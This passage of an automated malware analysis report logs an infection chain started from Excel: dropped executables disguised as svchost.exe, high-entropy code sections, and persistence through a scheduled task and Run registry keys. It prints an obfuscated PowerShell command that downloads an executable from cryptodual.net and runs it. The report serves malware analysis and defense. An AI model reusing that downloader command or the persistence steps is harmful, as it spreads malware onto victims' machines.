            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 32_2_0020887D push esp; retf
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 32_2_00208158 push esp; ret
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 32_2_00207A76 push esp; ret
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 32_2_00206AB5 push esp; retf
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 32_2_002094C1 push esp; retf
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 32_2_00207EC4 push esp; ret
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 32_2_003C721B push ecx; retf
            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 35_2_0023B93E push es; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.92184485792
            Source: initial sampleStatic PE information: section name: .text entropy: 7.92184485792
            Source: initial sampleStatic PE information: section name: .text entropy: 7.92184485792

            Persistence and Installation Behavior:

            barindex
            Drops PE files with benign system namesShow sources
            Source: C:\Users\user\AppData\Local\Temp\ps.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
            Tries to download and execute files (via powershell)Show sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;
            Source: C:\Users\user\AppData\Local\Temp\ps.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ps.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\ps.exeFile created: C:\Users\user\AppData\Roaming\GvthaHtVzpRh.exeJump to dropped file

            Boot Survival:

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Microsoft
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
